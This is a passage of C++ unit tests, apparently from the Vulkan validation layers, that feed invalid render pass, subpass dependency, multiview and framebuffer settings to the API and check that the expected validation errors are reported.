m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02549", nullptr); // Set wrong load operation attach = {0, VK_FORMAT_R8G8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; ref = {0, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02550", nullptr); // Set wrong store operation attach = {0, VK_FORMAT_R8G8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_STORE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; ref = {0, VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT}; subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &ref, 0, nullptr, nullptr, nullptr, 0, nullptr}; rpfdmi = {VK_STRUCTURE_TYPE_RENDER_PASS_FRAGMENT_DENSITY_MAP_CREATE_INFO_EXT, nullptr, ref}; rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpfdmi, 0, 1, &attach, 1, &subpass, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassFragmentDensityMapCreateInfoEXT-fragmentDensityMapAttachment-02551", nullptr); } TEST_F(VkLayerTest, RenderPassCreateSubpassNonGraphicsPipeline) { TEST_DESCRIPTION("Create a subpass with the compute pipeline bind point"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_COMPUTE, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 1, subpasses, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pipelineBindPoint-00844", "VUID-VkSubpassDescription2-pipelineBindPoint-03062"); } TEST_F(VkLayerTest, RenderPassCreateSubpassMissingAttributesBitMultiviewNVX) { TEST_DESCRIPTION("Create a subpass with the VK_SUBPASS_DESCRIPTION_PER_VIEW_ATTRIBUTES_BIT_NVX flag missing"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME) && DeviceExtensionSupported(gpu(), nullptr, 
VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_NVX_MULTIVIEW_PER_VIEW_ATTRIBUTES_EXTENSION_NAME); return; } bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpasses[] = { {VK_SUBPASS_DESCRIPTION_PER_VIEW_POSITION_X_ONLY_BIT_NVX, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 1, subpasses, 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-flags-00856", "VUID-VkSubpassDescription2-flags-03076"); } TEST_F(VkLayerTest, RenderPassCreate2SubpassInvalidInputAttachmentParameters) { TEST_DESCRIPTION("Create a subpass with parameters in the input attachment ref which are invalid"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_CREATE_RENDERPASS_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (!rp2Supported) { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_CREATE_RENDERPASS_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkAttachmentDescription2KHR attach_desc = {}; attach_desc.sType = VK_STRUCTURE_TYPE_ATTACHMENT_DESCRIPTION_2_KHR; attach_desc.format = VK_FORMAT_UNDEFINED; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; VkAttachmentReference2KHR reference = {}; reference.sType = VK_STRUCTURE_TYPE_ATTACHMENT_REFERENCE_2_KHR; reference.layout = VK_IMAGE_LAYOUT_GENERAL; reference.aspectMask = 0; VkSubpassDescription2KHR subpass = {VK_STRUCTURE_TYPE_SUBPASS_DESCRIPTION_2_KHR, nullptr, 0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, 1, &reference, 0, nullptr, nullptr, nullptr, 0, nullptr}; VkRenderPassCreateInfo2KHR rpci2 = { VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO_2_KHR, nullptr, 0, 1, &attach_desc, 1, &subpass, 0, nullptr, 0, nullptr}; // Test for aspect mask of 0 TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), &rpci2, "VUID-VkSubpassDescription2-attachment-02800"); // Test for invalid aspect mask bits reference.aspectMask = 0x40000000; // invalid VkImageAspectFlagBits value TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), &rpci2, "VUID-VkSubpassDescription2-attachment-02799"); } TEST_F(VkLayerTest, RenderPassCreateInvalidSubpassDependencies) { // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2_supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool multiviewSupported = rp2_supported; if (!rp2_supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { 
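        // Fall back to the VK_KHR_multiview device extension when the render pass 2 extension is unavailable,
        // so the view-local dependency checks gated by multiviewSupported further down can still run.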
m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); multiviewSupported = true; } // Add a device features struct enabling NO features VkPhysicalDeviceFeatures features = {0}; ASSERT_NO_FATAL_FAILURE(InitState(&features)); if (m_device->props.apiVersion >= VK_API_VERSION_1_1) { multiviewSupported = true; } // Create two dummy subpasses VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; VkSubpassDependency dependency; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 2, subpasses, 1, &dependency}; // Non graphics stages in subpass dependency dependency = {0, 1, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT | VK_PIPELINE_STAGE_TRANSFER_BIT, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {0, 1, VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {0, 1, VK_PIPELINE_STAGE_HOST_BIT, VK_PIPELINE_STAGE_COLOR_ATTACHMENT_OUTPUT_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_FRAGMENT_SHADER_BIT | VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00838", "VUID-VkRenderPassCreateInfo2-pDependencies-03055"); dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_HOST_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00838", "VUID-VkRenderPassCreateInfo2-pDependencies-03055"); dependency = {0, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); dependency = {VK_SUBPASS_EXTERNAL, 0, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00838", "VUID-VkRenderPassCreateInfo2-pDependencies-03055"); dependency = {0, 0, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkRenderPassCreateInfo-pDependencies-00837", "VUID-VkRenderPassCreateInfo2-pDependencies-03054"); // Geometry shaders not enabled source dependency = {0, 1, VK_PIPELINE_STAGE_GEOMETRY_SHADER_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcStageMask-00860", "VUID-VkSubpassDependency2-srcStageMask-03080"); // Geometry shaders not enabled destination 
dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_GEOMETRY_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dstStageMask-00861", "VUID-VkSubpassDependency2-dstStageMask-03081"); // Tessellation not enabled source dependency = {0, 1, VK_PIPELINE_STAGE_TESSELLATION_CONTROL_SHADER_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcStageMask-00862", "VUID-VkSubpassDependency2-srcStageMask-03082"); // Tessellation not enabled destination dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_TESSELLATION_EVALUATION_SHADER_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dstStageMask-00863", "VUID-VkSubpassDependency2-dstStageMask-03083"); // Potential cyclical dependency dependency = {1, 0, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00864", "VUID-VkSubpassDependency2-srcSubpass-03084"); // EXTERNAL to EXTERNAL dependency dependency = { VK_SUBPASS_EXTERNAL, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00865", "VUID-VkSubpassDependency2-srcSubpass-03085"); // Logically later source stages in self dependency dependency = {0, 0, VK_PIPELINE_STAGE_VERTEX_SHADER_BIT, VK_PIPELINE_STAGE_VERTEX_INPUT_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00867", "VUID-VkSubpassDependency2-srcSubpass-03087"); // Source access mask mismatch with source stage mask dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, VK_ACCESS_UNIFORM_READ_BIT, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcAccessMask-00868", "VUID-VkSubpassDependency2-srcAccessMask-03088"); // Destination access mask mismatch with destination stage mask dependency = { 0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_FRAGMENT_SHADER_BIT, 0, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dstAccessMask-00869", "VUID-VkSubpassDependency2-dstAccessMask-03089"); if (multiviewSupported) { // VIEW_LOCAL_BIT but multiview is not enabled dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, nullptr, "VUID-VkRenderPassCreateInfo2-viewMask-03059"); // Enable multiview uint32_t pViewMasks[2] = {0x3u, 0x3u}; int32_t pViewOffsets[2] = {0, 0}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 2, pViewMasks, 0, nullptr, 0, nullptr}; rpci.pNext = &rpmvci; // Excessive view offsets dependency = {0, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; rpmvci.pViewOffsets = pViewOffsets; rpmvci.dependencyCount = 2; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, 
"VUID-VkRenderPassCreateInfo-pNext-01929", nullptr); rpmvci.dependencyCount = 0; // View offset with subpass self dependency dependency = {0, 0, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; rpmvci.pViewOffsets = pViewOffsets; pViewOffsets[0] = 1; rpmvci.dependencyCount = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, false, "VUID-VkRenderPassCreateInfo-pNext-01930", nullptr); rpmvci.dependencyCount = 0; // View offset with no view local bit if (rp2_supported) { dependency = {0, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; rpmvci.pViewOffsets = pViewOffsets; pViewOffsets[0] = 1; rpmvci.dependencyCount = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, nullptr, "VUID-VkSubpassDependency2-dependencyFlags-03092"); rpmvci.dependencyCount = 0; } // EXTERNAL subpass with VIEW_LOCAL_BIT - source subpass dependency = {VK_SUBPASS_EXTERNAL, 1, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dependencyFlags-02520", "VUID-VkSubpassDependency2-dependencyFlags-03090"); // EXTERNAL subpass with VIEW_LOCAL_BIT - destination subpass dependency = {0, VK_SUBPASS_EXTERNAL, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, VK_DEPENDENCY_VIEW_LOCAL_BIT}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-dependencyFlags-02521", "VUID-VkSubpassDependency2-dependencyFlags-03091"); // Multiple views but no view local bit in self-dependency dependency = {0, 0, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, 0, 0, 0}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2_supported, "VUID-VkSubpassDependency-srcSubpass-00872", "VUID-VkRenderPassCreateInfo2-pDependencies-03060"); } } TEST_F(VkLayerTest, RenderPassCreateInvalidMixedAttachmentSamplesAMD) { TEST_DESCRIPTION("Verify error messages for supported and unsupported sample counts in render pass attachments."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_AMD_MIXED_ATTACHMENT_SAMPLES_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_AMD_MIXED_ATTACHMENT_SAMPLES_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_AMD_MIXED_ATTACHMENT_SAMPLES_EXTENSION_NAME); return; } bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); std::vector<VkAttachmentDescription> attachments; { VkAttachmentDescription att = {}; att.format = VK_FORMAT_R8G8B8A8_UNORM; att.samples = VK_SAMPLE_COUNT_1_BIT; att.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; att.storeOp = VK_ATTACHMENT_STORE_OP_STORE; att.stencilLoadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; att.stencilStoreOp = VK_ATTACHMENT_STORE_OP_DONT_CARE; att.initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; att.finalLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; attachments.push_back(att); att.format = VK_FORMAT_D16_UNORM; att.samples = VK_SAMPLE_COUNT_4_BIT; att.loadOp = 
VK_ATTACHMENT_LOAD_OP_CLEAR; att.storeOp = VK_ATTACHMENT_STORE_OP_STORE; att.stencilLoadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; att.stencilStoreOp = VK_ATTACHMENT_STORE_OP_STORE; att.initialLayout = VK_IMAGE_LAYOUT_UNDEFINED; att.finalLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; attachments.push_back(att); } VkAttachmentReference color_ref = {}; color_ref.attachment = 0; color_ref.layout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; VkAttachmentReference depth_ref = {}; depth_ref.attachment = 1; depth_ref.layout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; VkSubpassDescription subpass = {}; subpass.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &color_ref; subpass.pDepthStencilAttachment = &depth_ref; VkRenderPassCreateInfo rpci = {}; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; rpci.attachmentCount = attachments.size(); rpci.pAttachments = attachments.data(); rpci.subpassCount = 1; rpci.pSubpasses = &subpass; m_errorMonitor->ExpectSuccess(); VkRenderPass rp; VkResult err; err = vk::CreateRenderPass(device(), &rpci, NULL, &rp); m_errorMonitor->VerifyNotFound(); if (err == VK_SUCCESS) vk::DestroyRenderPass(m_device->device(), rp, nullptr); // Expect an error message for invalid sample counts attachments[0].samples = VK_SAMPLE_COUNT_4_BIT; attachments[1].samples = VK_SAMPLE_COUNT_1_BIT; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pColorAttachments-01506", "VUID-VkSubpassDescription2-pColorAttachments-03070"); } TEST_F(VkLayerTest, RenderPassBeginInvalidRenderArea) { TEST_DESCRIPTION("Generate INVALID_RENDER_AREA error by beginning renderpass with extent outside of framebuffer"); SetTargetApiVersion(VK_API_VERSION_1_2); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Framebuffer for render target is 256x256, exceed that for INVALID_RENDER_AREA m_renderPassBeginInfo.renderArea.extent.width = 257; m_renderPassBeginInfo.renderArea.extent.height = 257; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &m_renderPassBeginInfo, rp2Supported, "Cannot execute a render pass with renderArea not within the bound of the framebuffer.", "Cannot execute a render pass with renderArea not within the bound of the framebuffer."); } TEST_F(VkLayerTest, RenderPassBeginWithinRenderPass) { // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); PFN_vkCmdBeginRenderPass2KHR vkCmdBeginRenderPass2KHR = nullptr; bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); if (rp2Supported) { vkCmdBeginRenderPass2KHR = (PFN_vkCmdBeginRenderPass2KHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdBeginRenderPass2KHR"); } 
ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Bind a BeginRenderPass within an active RenderPass m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); // Just use a dummy Renderpass m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBeginRenderPass-renderpass"); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &m_renderPassBeginInfo, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->VerifyFound(); if (rp2Supported) { VkSubpassBeginInfoKHR subpassBeginInfo = {VK_STRUCTURE_TYPE_SUBPASS_BEGIN_INFO_KHR, nullptr, VK_SUBPASS_CONTENTS_INLINE}; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBeginRenderPass2-renderpass"); vkCmdBeginRenderPass2KHR(m_commandBuffer->handle(), &m_renderPassBeginInfo, &subpassBeginInfo); m_errorMonitor->VerifyFound(); } } TEST_F(VkLayerTest, RenderPassBeginIncompatibleFramebufferRenderPass) { TEST_DESCRIPTION("Test that renderpass begin is compatible with the framebuffer renderpass "); ASSERT_NO_FATAL_FAILURE(Init(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); // Create a depth stencil image view VkImageObj image(m_device); image.Init(128, 128, 1, VK_FORMAT_D16_UNORM, VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(image.initialized()); VkImageView dsv; VkImageViewCreateInfo dsvci = {}; dsvci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; dsvci.pNext = nullptr; dsvci.image = image.handle(); dsvci.viewType = VK_IMAGE_VIEW_TYPE_2D; dsvci.format = VK_FORMAT_D16_UNORM; dsvci.subresourceRange.layerCount = 1; dsvci.subresourceRange.baseMipLevel = 0; dsvci.subresourceRange.levelCount = 1; dsvci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; vk::CreateImageView(m_device->device(), &dsvci, NULL, &dsv); // Create a renderPass with a single attachment that uses loadOp CLEAR VkAttachmentDescription description = {0, VK_FORMAT_D16_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_LOAD, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}; VkAttachmentReference depth_stencil_ref = {0, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, &depth_stencil_ref, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &description, 1, &subpass, 0, nullptr}; VkRenderPass rp1, rp2; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp1); subpass.pDepthStencilAttachment = nullptr; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp2); // Create a framebuffer VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp1, 1, &dsv, 128, 128, 1}; VkFramebuffer fb; vk::CreateFramebuffer(m_device->handle(), &fbci, nullptr, &fb); VkRenderPassBeginInfo rp_begin = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp2, fb, {{0, 0}, {128, 128}}, 0, nullptr}; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, false, "VUID-VkRenderPassBeginInfo-renderPass-00904", nullptr); vk::DestroyRenderPass(m_device->device(), rp1, nullptr); vk::DestroyRenderPass(m_device->device(), rp2, nullptr); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyImageView(m_device->device(), dsv, nullptr); } TEST_F(VkLayerTest, RenderPassBeginLayoutsFramebufferImageUsageMismatches) { 